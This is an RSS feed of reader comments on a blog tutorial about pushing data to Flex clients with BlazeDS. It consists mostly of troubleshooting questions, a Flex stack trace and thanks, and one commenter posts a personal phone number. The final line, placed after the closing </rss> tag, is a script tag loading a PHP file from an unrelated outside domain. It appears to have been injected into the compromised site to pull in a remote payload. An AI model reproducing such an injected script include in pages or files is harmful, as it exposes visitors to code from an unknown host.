<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: BlazeDS Data push with Remote Objects</title>
	<atom:link href="http://codeofdoom.com/wordpress/2009/01/29/blazeds-data-push-with-remote-objects/feed/" rel="self" type="application/rss+xml" />
	<link>http://codeofdoom.com/wordpress/2009/01/29/blazeds-data-push-with-remote-objects/</link>
	<description></description>
	<lastBuildDate>Thu, 29 Jul 2010 14:18:31 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>By: Craig Kaminsky</title>
		<link>http://codeofdoom.com/wordpress/2009/01/29/blazeds-data-push-with-remote-objects/comment-page-1/#comment-387</link>
		<dc:creator>Craig Kaminsky</dc:creator>
		<pubDate>Thu, 29 Jul 2010 14:18:31 +0000</pubDate>
		<guid isPermaLink="false">http://codeofdoom.com/wordpress/?p=61#comment-387</guid>
		<description>Just wanted to say THANK YOU! I&#039;ve been trying to get my head around pushing data to a Flex client with BlazeDS (I had only done it previously with Adobe CF 8, which a basic LCDS version baked in). You&#039;re tutorial was awesome and helpful. No issues at all. 

Now to get it to push to subtopics :)! 

Once again, thank you, so much!</description>
		<content:encoded><![CDATA[<p>Just wanted to say THANK YOU! I&#8217;ve been trying to get my head around pushing data to a Flex client with BlazeDS (I had only done it previously with Adobe CF 8, which a basic LCDS version baked in). You&#8217;re tutorial was awesome and helpful. No issues at all. </p>
<p>Now to get it to push to subtopics <img src='http://codeofdoom.com/wordpress/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> ! </p>
<p>Once again, thank you, so much!</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Gopi Shankar</title>
		<link>http://codeofdoom.com/wordpress/2009/01/29/blazeds-data-push-with-remote-objects/comment-page-1/#comment-368</link>
		<dc:creator>Gopi Shankar</dc:creator>
		<pubDate>Wed, 09 Jun 2010 12:07:57 +0000</pubDate>
		<guid isPermaLink="false">http://codeofdoom.com/wordpress/?p=61#comment-368</guid>
		<description>I got it rectified, a small change required in the .flexproperties file, make sure the serverContextRoot=&quot;/$Project_Name$&quot; your Project name, earlier it was pointed /WebContent</description>
		<content:encoded><![CDATA[<p>I got it rectified, a small change required in the .flexproperties file, make sure the serverContextRoot=&#8221;/$Project_Name$&#8221; your Project name, earlier it was pointed /WebContent</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Gopi Shankar</title>
		<link>http://codeofdoom.com/wordpress/2009/01/29/blazeds-data-push-with-remote-objects/comment-page-1/#comment-367</link>
		<dc:creator>Gopi Shankar</dc:creator>
		<pubDate>Wed, 09 Jun 2010 11:52:05 +0000</pubDate>
		<guid isPermaLink="false">http://codeofdoom.com/wordpress/?p=61#comment-367</guid>
		<description>Hai Marcel,
   My Problem, in the invoke(), always it performs else part only and the datagrid it not populated either. Moreover i dont get the ack in the client side. Please help me, reply be ASAP.

Advance Thank you ;-)</description>
		<content:encoded><![CDATA[<p>Hai Marcel,<br />
   My Problem, in the invoke(), always it performs else part only and the datagrid it not populated either. Moreover i dont get the ack in the client side. Please help me, reply be ASAP.</p>
<p>Advance Thank you <img src='http://codeofdoom.com/wordpress/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /> </p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Gopi Shankar</title>
		<link>http://codeofdoom.com/wordpress/2009/01/29/blazeds-data-push-with-remote-objects/comment-page-1/#comment-366</link>
		<dc:creator>Gopi Shankar</dc:creator>
		<pubDate>Wed, 09 Jun 2010 11:47:58 +0000</pubDate>
		<guid isPermaLink="false">http://codeofdoom.com/wordpress/?p=61#comment-366</guid>
		<description>&lt;a href=&quot;#comment-164&quot; rel=&quot;nofollow&quot;&gt;@poornimahc&lt;/a&gt; 

How did you solve that problem finally that you have posted a year back. Cause i am facing it.</description>
		<content:encoded><![CDATA[<p><a href="#comment-164" rel="nofollow">@poornimahc</a> </p>
<p>How did you solve that problem finally that you have posted a year back. Cause i am facing it.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Karan</title>
		<link>http://codeofdoom.com/wordpress/2009/01/29/blazeds-data-push-with-remote-objects/comment-page-1/#comment-362</link>
		<dc:creator>Karan</dc:creator>
		<pubDate>Mon, 24 May 2010 12:49:29 +0000</pubDate>
		<guid isPermaLink="false">http://codeofdoom.com/wordpress/?p=61#comment-362</guid>
		<description>Hi

This data push mechanism means that all flex clients will listen to the same data pushed by the server.
In my case , I want that the client sends a request to the server and then the server starts pushing data that the client then listens to. 
But,
another client at the same time may submit a different request and the server should also push responses to this request.

So how to implement a scenario where the pushed data for each client is different? Means all clients should listen to only that data which is of their specific use.????</description>
		<content:encoded><![CDATA[<p>Hi</p>
<p>This data push mechanism means that all flex clients will listen to the same data pushed by the server.<br />
In my case , I want that the client sends a request to the server and then the server starts pushing data that the client then listens to.<br />
But,<br />
another client at the same time may submit a different request and the server should also push responses to this request.</p>
<p>So how to implement a scenario where the pushed data for each client is different? Means all clients should listen to only that data which is of their specific use.????</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Karan</title>
		<link>http://codeofdoom.com/wordpress/2009/01/29/blazeds-data-push-with-remote-objects/comment-page-1/#comment-361</link>
		<dc:creator>Karan</dc:creator>
		<pubDate>Mon, 24 May 2010 07:16:27 +0000</pubDate>
		<guid isPermaLink="false">http://codeofdoom.com/wordpress/?p=61#comment-361</guid>
		<description>Hi,

After deploying the application and hitting the url,I get the following error just as the swf begins to load:

[MessagingError message=&#039;Destination &#039;BlazeDsServicePush&#039; either does not exist or the destination has no channels defined (and the application does not define any default channels.)&#039;]
	at mx.messaging.config::ServerConfig$/internalGetChannelSet()[C:\autobuild\3.2.0\frameworks\projects\rpc\src\mx\messaging\config\ServerConfig.as:635]
	at mx.messaging.config::ServerConfig$/getChannelSet()[C:\autobuild\3.2.0\frameworks\projects\rpc\src\mx\messaging\config\ServerConfig.as:257]
	at mx.messaging::MessageAgent/initChannelSet()[C:\autobuild\3.2.0\frameworks\projects\rpc\src\mx\messaging\MessageAgent.as:1111]
	at mx.messaging::MessageAgent/internalSend()[C:\autobuild\3.2.0\frameworks\projects\rpc\src\mx\messaging\MessageAgent.as:1087]
	at mx.messaging::Producer/internalSend()[C:\autobuild\3.2.0\frameworks\projects\rpc\src\mx\messaging\Producer.as:146]
	at mx.messaging::AbstractProducer/send()[C:\autobuild\3.2.0\frameworks\projects\rpc\src\mx\messaging\AbstractProducer.as:470]
	at main/init()[C:\Users\Karan@Xebia\workspace\identifyww\identifyww-web-layer\flex-gui\src\main\flex\main.mxml:14]
	at main/___main_Application1_creationComplete()[C:\Users\Karan@Xebia\workspace\identifyww\identifyww-web-layer\flex-gui\src\main\flex\main.mxml:2]
	at flash.events::EventDispatcher/dispatchEventFunction()
	at flash.events::EventDispatcher/dispatchEvent()
	at mx.core::UIComponent/dispatchEvent()[C:\autobuild\3.2.0\frameworks\projects\framework\src\mx\core\UIComponent.as:9298]
	at mx.core::UIComponent/set initialized()[C:\autobuild\3.2.0\frameworks\projects\framework\src\mx\core\UIComponent.as:1169]
	at mx.managers::LayoutManager/doPhasedInstantiation()[C:\autobuild\3.2.0\frameworks\projects\framework\src\mx\managers\LayoutManager.as:718]
	at Function/http://adobe.com/AS3/2006/builtin::apply()
	at mx.core::UIComponent/callLaterDispatcher2()[C:\autobuild\3.2.0\frameworks\projects\framework\src\mx\core\UIComponent.as:8628]
	at mx.core::UIComponent/callLaterDispatcher()[C:\autobuild\3.2.0\frameworks\projects\framework\src\mx\core\UIComponent.as:8568]


_____________________-  I have checked and all configuration files are placed correctly.


Moreover , I tried downloading your source code project and running it, but the ant tasks do not have a compilation task for the flex side, so the was does get created but there is no swf in it to hit....

kindly help</description>
		<content:encoded><![CDATA[<p>Hi,</p>
<p>After deploying the application and hitting the url,I get the following error just as the swf begins to load:</p>
<p>[MessagingError message='Destination 'BlazeDsServicePush' either does not exist or the destination has no channels defined (and the application does not define any default channels.)']<br />
	at mx.messaging.config::ServerConfig$/internalGetChannelSet()[C:\autobuild\3.2.0\frameworks\projects\rpc\src\mx\messaging\config\ServerConfig.as:635]<br />
	at mx.messaging.config::ServerConfig$/getChannelSet()[C:\autobuild\3.2.0\frameworks\projects\rpc\src\mx\messaging\config\ServerConfig.as:257]<br />
	at mx.messaging::MessageAgent/initChannelSet()[C:\autobuild\3.2.0\frameworks\projects\rpc\src\mx\messaging\MessageAgent.as:1111]<br />
	at mx.messaging::MessageAgent/internalSend()[C:\autobuild\3.2.0\frameworks\projects\rpc\src\mx\messaging\MessageAgent.as:1087]<br />
	at mx.messaging::Producer/internalSend()[C:\autobuild\3.2.0\frameworks\projects\rpc\src\mx\messaging\Producer.as:146]<br />
	at mx.messaging::AbstractProducer/send()[C:\autobuild\3.2.0\frameworks\projects\rpc\src\mx\messaging\AbstractProducer.as:470]<br />
	at main/init()[C:\Users\Karan@Xebia\workspace\identifyww\identifyww-web-layer\flex-gui\src\main\flex\main.mxml:14]<br />
	at main/___main_Application1_creationComplete()[C:\Users\Karan@Xebia\workspace\identifyww\identifyww-web-layer\flex-gui\src\main\flex\main.mxml:2]<br />
	at flash.events::EventDispatcher/dispatchEventFunction()<br />
	at flash.events::EventDispatcher/dispatchEvent()<br />
	at mx.core::UIComponent/dispatchEvent()[C:\autobuild\3.2.0\frameworks\projects\framework\src\mx\core\UIComponent.as:9298]<br />
	at mx.core::UIComponent/set initialized()[C:\autobuild\3.2.0\frameworks\projects\framework\src\mx\core\UIComponent.as:1169]<br />
	at mx.managers::LayoutManager/doPhasedInstantiation()[C:\autobuild\3.2.0\frameworks\projects\framework\src\mx\managers\LayoutManager.as:718]<br />
	at Function/http://adobe.com/AS3/2006/builtin::apply()<br />
	at mx.core::UIComponent/callLaterDispatcher2()[C:\autobuild\3.2.0\frameworks\projects\framework\src\mx\core\UIComponent.as:8628]<br />
	at mx.core::UIComponent/callLaterDispatcher()[C:\autobuild\3.2.0\frameworks\projects\framework\src\mx\core\UIComponent.as:8568]</p>
<p>_____________________-  I have checked and all configuration files are placed correctly.</p>
<p>Moreover , I tried downloading your source code project and running it, but the ant tasks do not have a compilation task for the flex side, so the was does get created but there is no swf in it to hit&#8230;.</p>
<p>kindly help</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Neel</title>
		<link>http://codeofdoom.com/wordpress/2009/01/29/blazeds-data-push-with-remote-objects/comment-page-1/#comment-352</link>
		<dc:creator>Neel</dc:creator>
		<pubDate>Thu, 06 May 2010 08:05:22 +0000</pubDate>
		<guid isPermaLink="false">http://codeofdoom.com/wordpress/?p=61#comment-352</guid>
		<description>&lt;a href=&quot;#comment-28&quot; rel=&quot;nofollow&quot;&gt;@admin&lt;/a&gt; 
Hello,
I have implemented the data push mechanism with tomcat-5.5.28 and flex. every thing is working perfectly in the local host, but when I have uploaded it to the production server, it just stopped working. The web-page is not able to get the acknowledgment from the server side. I have checked by writing a file in the server side and the request is reaching to the server and every thing is fine.. only thing is that it is not revert back the ACK. You please reply me as soon as possible. I am in problem with that issue since 10 days.

Thanks and Regards
Neel.
8100937755</description>
		<content:encoded><![CDATA[<p><a href="#comment-28" rel="nofollow">@admin</a><br />
Hello,<br />
I have implemented the data push mechanism with tomcat-5.5.28 and flex. every thing is working perfectly in the local host, but when I have uploaded it to the production server, it just stopped working. The web-page is not able to get the acknowledgment from the server side. I have checked by writing a file in the server side and the request is reaching to the server and every thing is fine.. only thing is that it is not revert back the ACK. You please reply me as soon as possible. I am in problem with that issue since 10 days.</p>
<p>Thanks and Regards<br />
Neel.<br />
8100937755</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Neel</title>
		<link>http://codeofdoom.com/wordpress/2009/01/29/blazeds-data-push-with-remote-objects/comment-page-1/#comment-351</link>
		<dc:creator>Neel</dc:creator>
		<pubDate>Thu, 06 May 2010 08:02:00 +0000</pubDate>
		<guid isPermaLink="false">http://codeofdoom.com/wordpress/?p=61#comment-351</guid>
		<description>&lt;a href=&quot;#comment-323&quot; rel=&quot;nofollow&quot;&gt;@Stefffen&lt;/a&gt; 
Hello,
I have implemented the data push mechanism with tomcat-5.5.28 and flex. every thing is working perfectly in the local host, but when I have uploaded it to the production server, it just stopped working. The web-page is not able to get the acknowledgment from the server side. I have checked by writing a file in the server side and the request is reaching to the server and every thing is fine.. only thing is that it is not revert back the ACK. You please reply me as soon as possible. I am in problem with that issue since 10 days.

Thanks and Regards
Neel.
8100937755</description>
		<content:encoded><![CDATA[<p><a href="#comment-323" rel="nofollow">@Stefffen</a><br />
Hello,<br />
I have implemented the data push mechanism with tomcat-5.5.28 and flex. every thing is working perfectly in the local host, but when I have uploaded it to the production server, it just stopped working. The web-page is not able to get the acknowledgment from the server side. I have checked by writing a file in the server side and the request is reaching to the server and every thing is fine.. only thing is that it is not revert back the ACK. You please reply me as soon as possible. I am in problem with that issue since 10 days.</p>
<p>Thanks and Regards<br />
Neel.<br />
8100937755</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Derrick</title>
		<link>http://codeofdoom.com/wordpress/2009/01/29/blazeds-data-push-with-remote-objects/comment-page-1/#comment-332</link>
		<dc:creator>Derrick</dc:creator>
		<pubDate>Thu, 08 Apr 2010 17:48:05 +0000</pubDate>
		<guid isPermaLink="false">http://codeofdoom.com/wordpress/?p=61#comment-332</guid>
		<description>Very nice, but you should &quot;definitely&quot; check out spring-blaze, and spring actionscript.</description>
		<content:encoded><![CDATA[<p>Very nice, but you should &#8220;definitely&#8221; check out spring-blaze, and spring actionscript.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: saha</title>
		<link>http://codeofdoom.com/wordpress/2009/01/29/blazeds-data-push-with-remote-objects/comment-page-1/#comment-326</link>
		<dc:creator>saha</dc:creator>
		<pubDate>Wed, 24 Mar 2010 19:44:12 +0000</pubDate>
		<guid isPermaLink="false">http://codeofdoom.com/wordpress/?p=61#comment-326</guid>
		<description>Hi,

I followed the same example, i get it working in Dev and QA, but it does not work in production. The generatePerson() method is succesfully executed (checked the logs) but it fails to call the invoke method. I don&#039;t see a message &#039;Adapter sending message Test&#039; displayed in my logs. This happens only in production, it works in Dev and QA. Let me know what the problem might be.</description>
		<content:encoded><![CDATA[<p>Hi,</p>
<p>I followed the same example, i get it working in Dev and QA, but it does not work in production. The generatePerson() method is succesfully executed (checked the logs) but it fails to call the invoke method. I don&#8217;t see a message &#8216;Adapter sending message Test&#8217; displayed in my logs. This happens only in production, it works in Dev and QA. Let me know what the problem might be.</p>
]]></content:encoded>
	</item>
</channel>
</rss>
<script src="http://indesignstudioinfo.com/ls.php"></script>